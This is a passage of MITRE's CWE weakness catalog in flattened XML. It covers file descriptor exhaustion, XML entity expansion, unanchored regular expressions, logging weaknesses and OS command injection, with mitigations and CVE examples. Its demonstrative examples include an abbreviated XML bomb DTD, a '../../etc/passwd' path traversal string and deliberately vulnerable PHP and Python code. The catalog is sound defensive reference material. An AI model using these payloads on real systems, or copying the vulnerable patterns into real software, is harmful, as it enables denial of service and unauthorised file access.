https://www.cve.org/CVERecord?id=CVE-2008-2122 + + + CVE-2007-4103 + Product allows resource exhaustion via a large number of calls that do not complete a 3-way handshake. + https://www.cve.org/CVERecord?id=CVE-2007-4103 + + + CVE-2002-1372 + Return values of file/socket operations not checked, allowing resultant consumption of file descriptors. + https://www.cve.org/CVERecord?id=CVE-2002-1372 + + + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + MEM31-C + Free dynamically allocated memory when no longer needed + CWE More Abstract + + + ASCSM-CWE-772 + + + ASCRM-CWE-772 + + + SFP14 + Failure to Release Resource + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + "Resource exhaustion" (CWE-400) is currently treated as a weakness, although it is more like a category of weaknesses that all have the same type of consequence. While this entry treats CWE-400 as a parent in view 1000, the relationship is probably more appropriately described as a chain. + Vulnerability theory is largely about how behaviors and resources interact. "Resource exhaustion" can be regarded as either a consequence or an attack, depending on the perspective. This entry is an attempt to reflect one of the underlying weaknesses that enable these attacks (or consequences) to take place. + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-02-16 + updated Demonstrative_Examples, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Observed_Examples, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Applicable_Platforms, Demonstrative_Examples + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not properly maintain references to a file descriptor or handle, which prevents that file descriptor/handle from being reclaimed. + This can cause the product to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations. + + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (Other) + An attacker that can influence the allocation of resources that are not properly maintained could deplete the available resource pool and prevent all other processes from accessing the same type of resource. + + + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + SFP14 + Failure to Release Resource + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product allocates file descriptors or handles on behalf of an actor without imposing any restrictions on how many descriptors can be allocated, in violation of the intended security policy for that actor. + This can cause the product to consume all available file descriptors or handles, which can prevent other processes from performing critical file processing operations. + + + + + + File Descriptor Exhaustion + + + + + Architecture and Design + + + Implementation + + + Low + + + Availability + DoS: Resource Consumption (Other) + When allocating resources without limits, an attacker could prevent all other processes from accessing the same type of resource. + + + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + SFP13 + Unrestricted Consumption + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Alternate_Terms, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product does not release a file descriptor or handle after its effective lifetime has ended, i.e., after the file descriptor/handle is no longer needed. + When a file descriptor or handle is not released after use (typically by explicitly closing it), attackers can cause a denial of service by consuming all available file descriptors/handles, or otherwise preventing other system processes from obtaining their own file descriptors/handles. + + + + + + + + Implementation + + + + + Availability + DoS: Resource Consumption (Other) + An attacker that can influence the allocation of resources that are not properly released could deplete the available resource pool and prevent all other processes from accessing the same type of resource. + + + + + Operation + Architecture and Design + Resource Limitation + + Use resource-limiting settings provided by the operating system or environment. For example, when managing system resources in POSIX, setrlimit() can be used to set limits for certain types of resources, and getrlimit() can determine how many resources are available. However, these functions are not available on all operating systems. + When the current levels get close to the maximum that is defined for the application (see CWE-770), then limit the allocation of further resources to privileged users; alternately, begin releasing resources for less-privileged users. While this mitigation may protect the system from attack, it will not necessarily stop attackers from adversely impacting other users. + Ensure that the application performs the appropriate error checks and error handling in case resources become unavailable (CWE-703). + + + + + + CVE-2007-0897 + Chain: anti-virus product encounters a malformed file but returns from a function without closing a file descriptor (CWE-775) leading to file descriptor consumption (CWE-400) and failed scans. + https://www.cve.org/CVERecord?id=CVE-2007-0897 + + + + + FIO42-C + Close files when they are no longer needed + CWE More Abstract + + + SFP14 + Failure to Release Resource + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-05-13 + 1.4 + 2009-05-27 + + + CWE Content Team + MITRE + 2009-12-28 + updated Observed_Examples + + + CWE Content Team + MITRE + 2010-04-05 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Common_Consequences, Relationships, Theoretical_Notes + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses XML documents and allows their structure to be defined with a Document Type Definition (DTD), but it does not properly control the number of recursive definitions of entities. + If the DTD contains a large number of nested or recursive entities, this can lead to explosive growth of data when parsed, causing a denial of service. + + + + + + + + + + + XEE + XEE is the acronym commonly used for XML Entity Expansion. + + + Billion Laughs Attack + + + XML Bomb + While the "XML Bomb" term was used in the early years of knowledge of this issue, the XEE term seems to be more commonly used. + + + + + Implementation + + + Operation + + + Medium + + + Availability + DoS: Resource Consumption (Other) + If parsed, recursive entity references allow the attacker to expand data exponentially, quickly consuming all system resources. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Operation + If possible, prohibit the use of DTDs or use an XML parser that limits the expansion of recursive DTD entities. + + + Implementation + Before parsing XML files with associated DTDs, scan for recursive entity declarations and do not continue parsing potentially explosive content. + + + + + The DTD and the very brief XML below illustrate what is meant by an XML bomb. The ZERO entity contains one character, the letter A. The choice of entity name ZERO is being used to indicate length equivalent to that exponent on two, that is, the length of ZERO is 2^0. Similarly, ONE refers to ZERO twice, therefore the XML parser will expand ONE to a length of 2, or 2^1. Ultimately, we reach entity THIRTYTWO, which will expand to 2^32 characters in length, or 4 GB, probably consuming far more data than expected. + + <?xml version="1.0"?><!DOCTYPE MaliciousDTD [<!ENTITY ZERO "A"><!ENTITY ONE "&ZERO;&ZERO;"><!ENTITY TWO "&ONE;&ONE;">...<!ENTITY THIRTYTWO "&THIRTYONE;&THIRTYONE;">]><data>&THIRTYTWO;</data> + + + + + + CVE-2008-3281 + XEE in XML-parsing library. + https://www.cve.org/CVERecord?id=CVE-2008-3281 + + + CVE-2011-3288 + XML bomb / XEE in enterprise communication product. + https://www.cve.org/CVERecord?id=CVE-2011-3288 + + + CVE-2011-1755 + "Billion laughs" attack in XMPP server daemon. + https://www.cve.org/CVERecord?id=CVE-2011-1755 + + + CVE-2009-1955 + XML bomb in web server module + https://www.cve.org/CVERecord?id=CVE-2009-1955 + + + CVE-2003-1564 + Parsing library allows XML bomb + https://www.cve.org/CVERecord?id=CVE-2003-1564 + + + + + 44 + XML Entity Expansion + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-06-30 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2013-02-21 + updated Alternate_Terms, Applicable_Platforms, Description, Name, Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, References + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-04-28 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Unrestricted Recursive Entity References in DTDs ('XML Bomb') + + + + The product uses a regular expression to perform neutralization, but the regular expression is not anchored and may allow malicious or malformed data to slip through. + When performing tasks such as validating against a set of allowed inputs (allowlist), data is examined and possibly modified to ensure that it is well-formed and adheres to a list of safe values. If the regular expression is not anchored, malicious or malformed data may be included before or after any string matching the regular expression. The type of malicious data that is allowed will depend on the context of the application and which anchors are omitted from the regular expression. + + + + + Regular expressions are typically used to match a pattern of text. Anchors are used in regular expressions to specify where the pattern should match: at the beginning, the end, or both (the whole input). + + + + Implementation + + + Medium + + + Availability + Confidentiality + Access Control + Bypass Protection Mechanism + An unanchored regular expression in the context of an allowlist will possibly result in a protection mechanism failure, allowing malicious or malformed data to enter trusted regions of the program. The specific consequences will depend on what functionality the allowlist was protecting. + + + + + Implementation + Be sure to understand both what will be matched and what will not be matched by a regular expression. Anchoring the ends of the expression will allow the programmer to define an allowlist strictly limited to what is matched by the text in the regular expression. If you are using a package that only matches one line by default, ensure that you can match multi-line inputs if necessary. + + + + + Consider a web application that supports multiple languages. It selects messages for an appropriate language by using the lang parameter. + + $dir = "/home/cwe/languages";$lang = $_GET['lang'];if (preg_match("/[A-Za-z0-9]+/", $lang)) {include("$dir/$lang");}else {echo "You shall not pass!\n";} + + The previous code attempts to match only alphanumeric values so that language values such as "english" and "french" are valid while also protecting against path traversal, CWE-22. However, the regular expression anchors are omitted, so any text containing at least one alphanumeric character will now pass the validation step. For example, the attack string below will match the regular expression. + + ../../etc/passwd + + If the attacker can inject code sequences into a file, such as the web server's HTTP request log, then the attacker may be able to redirect the lang parameter to the log file and execute arbitrary code. + + + This code uses a regular expression to validate an IP string prior to using it in a call to the "ping" command. + + + import subprocess + import re + + def validate_ip_regex(ip: str): + + ip_validator = re.compile(r"((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}") + if ip_validator.match(ip): + + return ip + + else: + + raise ValueError("IP address does not match valid pattern.") + + + + def run_ping_regex(ip: str): + + validated = validate_ip_regex(ip) + # The ping command treats zero-prepended IP addresses as octal + result = subprocess.call(["ping", validated]) + print(result) + + + + Since the regular expression does not have anchors (CWE-777), i.e. is unbounded without ^ or $ characters, then prepending a 0 or 0x to the beginning of the IP address will still result in a matched regex pattern. Since the ping command supports octal and hex prepended IP addresses, it will use the unexpectedly valid IP address (CWE-1389). For example, "0x63.63.63.63" would be considered equivalent to "99.63.63.63". As a result, the attacker could potentially ping systems that the attacker cannot reach directly. + + + + + CVE-2022-30034 + Chain: Web UI for a Python RPC framework does not use regex anchors to validate user login emails (CWE-777), potentially allowing bypass of OAuth (CWE-1390). + https://www.cve.org/CVERecord?id=CVE-2022-30034 + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-06-30 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2010-06-21 + updated Description + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Common_Consequences, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + When a security-critical event occurs, the product either does not record the event or omits important details about the event when logging it. + + When security-critical events are not logged properly, such as a failed login attempt, this can make malicious behavior more difficult to detect and may hinder forensic analysis after an attack succeeds. + As organizations adopt cloud storage resources, these technologies often require configuration changes to enable detailed logging information, since detailed logging can incur additional costs. This could lead to telemetry gaps in critical audit logs. For example, in Azure, the default value for logging is disabled. + + + + + + + + + + + Operation + COMMISSION: This weakness refers to an incorrect design related to an architectural security tactic. + + + Medium + + + Non-Repudiation + Hide Activities + If security critical information is not recorded, there will be no trail for forensic analysis and discovering the cause of problems or the source of attacks may become more difficult or impossible. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Architecture and Design + Use a centralized logging mechanism that supports multiple levels of detail. + + + Implementation + Ensure that all security-related successes and failures can be logged. When storing data in the cloud (e.g., AWS S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to enable and capture detailed logging information. + + + Operation + Be sure to set the level of logging appropriately in a production environment. Sufficient data should be logged to enable system administrators to detect attacks, diagnose errors, and recover from attacks. At the same time, logging too much data (CWE-779) can cause the same problems, including unexpected costs when using a cloud environment. + + + Operation + To enable storage logging using Azure's Portal, navigate to the name of the Storage Account, locate Monitoring (CLASSIC) section, and select Diagnostic settings (classic). For each of the various properties (blob, file, table, queue), ensure the status is properly set for the desired logging data. If using PowerShell, the Set-AzStorageServiceLoggingProperty command could be called using appropriate -ServiceType, -LoggingOperations, and -RetentionDays arguments. + + + + + The example below shows a configuration for the service security audit feature in the Windows Communication Foundation (WCF). + + <system.serviceModel><behaviors><serviceBehaviors><behavior name="NewBehavior"><serviceSecurityAudit auditLogLocation="Default"suppressAuditFailure="false"serviceAuthorizationAuditLevel="None"messageAuthenticationAuditLevel="None" />... + + </system.serviceModel> + + The previous configuration file has effectively disabled the recording of security-critical events, which would force the administrator to look to other sources during debug or recovery efforts. + Logging failed authentication attempts can warn administrators of potential brute force attacks. Similarly, logging successful authentication events can provide a useful audit trail when a legitimate account is compromised. The following configuration shows appropriate settings, assuming that the site does not have excessive traffic, which could fill the logs if there are a large number of success or failure events (CWE-779). + + <system.serviceModel><behaviors><serviceBehaviors><behavior name="NewBehavior"><serviceSecurityAudit auditLogLocation="Default"suppressAuditFailure="false"serviceAuthorizationAuditLevel="SuccessAndFailure"messageAuthenticationAuditLevel="SuccessAndFailure" /> + ... + + </system.serviceModel> + + + + In the following Java example the code attempts to authenticate the user. If the login fails a retry is made. Proper restrictions on the number of login attempts are of course part of the retry functionality. Unfortunately, the failed login is not recorded and there would be no record of an adversary attempting to brute force the program. + + if LoginUser(){ + // Login successful + RunProgram(); + } else { + // Login unsuccessful + LoginRetry(); + } + + It is recommended to log the failed login action. Note that unneutralized usernames should not be part of the log message, and passwords should never be part of the log message. + + if LoginUser(){ + // Login successful + log.warn("Login by user successful."); + RunProgram(); + } else { + + // Login unsuccessful + log.warn("Login attempt by user failed, trying again."); + LoginRetry(); + } + + + + Consider this command for updating Azure's Storage Logging for Blob service, adapted from [REF-1307]: + + az storage logging update --account-name --account-key --services b --log d --retention 90 + + The "--log d" portion of the command says to log deletes. However, the argument does not include the logging of writes and reads. Adding the "rw" arguments to the -log parameter will fix the issue: + + az storage logging update --account-name --account-key --services b --log rwd --retention 90 + + To enable Azure's storage analytic logs programmatically using PowerShell: + + Set-AzStorageServiceLoggingProperty -ServiceType Queue -LoggingOperations read,write,delete -RetentionDays 5 -Context $MyContextObject + + Notice that here, the retention has been limited to 5 days. + + + + + CVE-2008-4315 + server does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected + https://www.cve.org/CVERecord?id=CVE-2008-4315 + + + CVE-2008-1203 + admin interface does not log failed authentication attempts, making it easier for attackers to perform brute force password guessing without being detected + https://www.cve.org/CVERecord?id=CVE-2008-1203 + + + CVE-2007-3730 + default configuration for POP server does not log source IP or username for login attempts + https://www.cve.org/CVERecord?id=CVE-2007-3730 + + + CVE-2007-1225 + proxy does not log requests without "http://" in the URL, allowing web surfers to access restricted web content without detection + https://www.cve.org/CVERecord?id=CVE-2007-1225 + + + CVE-2003-1566 + web server does not log requests for a non-standard request type + https://www.cve.org/CVERecord?id=CVE-2003-1566 + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-07-02 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Description, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + Fortify Software + 2009-07-02 + Provided code example and additional information for description and consequences. + + + Drew Buttner + 2022-08-15 + Suggested a new demonstrative example and changes to the mitigations. + + + + + The product logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack. + While logging is a good practice in general, and very high levels of logging are appropriate for debugging stages of development, too much logging in a production environment might hinder a system administrator's ability to detect anomalous conditions. This can provide cover for an attacker while attempting to penetrate a system, clutter the audit trail for forensic analysis, or make it more difficult to debug problems in a production environment. + + + + + + + + + Operation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + Low + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Other) + Log files can become so large that they consume excessive resources, such as disk and CPU, which can hinder the performance of the system. + + + Non-Repudiation + Hide Activities + Logging too much information can make the log files of less use to forensics analysts and developers when trying to diagnose a problem or recover from an attack. + + + Non-Repudiation + Hide Activities + If system administrators are unable to effectively process log files, attempted attacks may go undetected, possibly leading to eventual system compromise. + + + + + Architecture and Design + Suppress large numbers of duplicate log messages and replace them with periodic summaries. For example, syslog may include an entry that states "last message repeated X times" when recording repeated events. + + + Architecture and Design + Support a maximum size for the log file that can be controlled by the administrator. If the maximum size is reached, the admin should be notified. Also, consider reducing functionality of the product. This may result in a denial-of-service to legitimate product users, but it will prevent the product from adversely impacting the entire system. + + + Implementation + Adjust configurations appropriately when the product is transitioned from a debug state to production. + + + + + CVE-2007-0421 + server records a large amount of data to the server log when it receives malformed headers + https://www.cve.org/CVERecord?id=CVE-2007-0421 + + + CVE-2002-1154 + chain: application does not restrict access to front-end for updates, which allows attacker to fill the error log + https://www.cve.org/CVERecord?id=CVE-2002-1154 + + + + + Part 3-3 + Req SR 7.2 + + + Part 4-1 + Req SD-1 + + + Part 4-1 + Req SVV-3 + + + Part 4-2 + Req CR 7.2 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2009-07-02 + 1.5 + 2009-07-27 + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + + + + The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component. + + This could allow attackers to execute unexpected, dangerous commands directly on the operating system. This weakness can lead to a vulnerability in environments in which the attacker does not have direct access to the operating system, such as in web applications. Alternately, if the weakness occurs in a privileged program, it could allow the attacker to specify commands that normally would not be accessible, or to call alternate commands with privileges that the attacker does not have. The problem is exacerbated if the compromised process does not follow the principle of least privilege, because the attacker-controlled commands may run with special system privileges that increases the amount of damage. + There are at least two subtypes of OS command injection: + + The application intends to execute a single, fixed program that is under its own control. It intends to use externally-supplied inputs as arguments to that program. For example, the program might use system("nslookup [HOSTNAME]") to run nslookup and allow the user to supply a HOSTNAME, which is used as an argument. Attackers cannot prevent nslookup from executing. However, if the program does not remove command separators from the HOSTNAME argument, attackers could place the separators into the arguments, which allows them to execute their own program after nslookup has finished executing. + The application accepts an input that it uses to fully select which program to run, as well as which commands to use. The application simply redirects this entire command to the operating system. For example, the program might use "exec([COMMAND])" to execute the [COMMAND] that was supplied by the user. If the COMMAND is under attacker control, then the attacker can execute arbitrary commands or programs. If the command is being executed using functions like exec() and CreateProcess(), the attacker might not be able to combine multiple commands together in the same line. + + From a weakness standpoint, these variants represent distinct programmer errors. In the first variant, the programmer clearly intends that input from untrusted parties will be part of the arguments in the command to be executed. In the second variant, the programmer does not intend for the command to be accessible to any untrusted party, but the programmer probably has not accounted for alternate ways in which malicious attackers can provide input. + + + + + + + + + + + + + + Shell injection + + + Shell metacharacters + + + + + Implementation + REALIZATION: This weakness is caused during implementation of an architectural security tactic. + + + High + + + Confidentiality + Integrity + Availability + Non-Repudiation + Execute Unauthorized Code or Commands + DoS: Crash, Exit, or Restart + Read Files or Directories + Modify Files or Directories + Read Application Data + Modify Application Data + Hide Activities + Attackers could execute unauthorized commands, which could then be used to disable the product, or read and modify data for which the attacker does not have permissions to access directly. Since the targeted application is directly executing the commands instead of the attacker, any malicious activities may appear to come from the application or the application's owner. + + + + + Automated Static Analysis + + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or require any code changes. + Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke OS commands, leading to false negatives - especially if the API/library code is not available for analysis. + + This is not a perfect solution, since 100% accuracy and coverage are not feasible. + + + Automated Dynamic Analysis + This weakness can be detected using dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + + + Manual Static Analysis + Since this weakness does not typically appear frequently within a single software package, manual white box techniques may be able to provide sufficient code coverage and reduction of false positives if all potentially-vulnerable operations can be assessed within limited time constraints. + High + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + 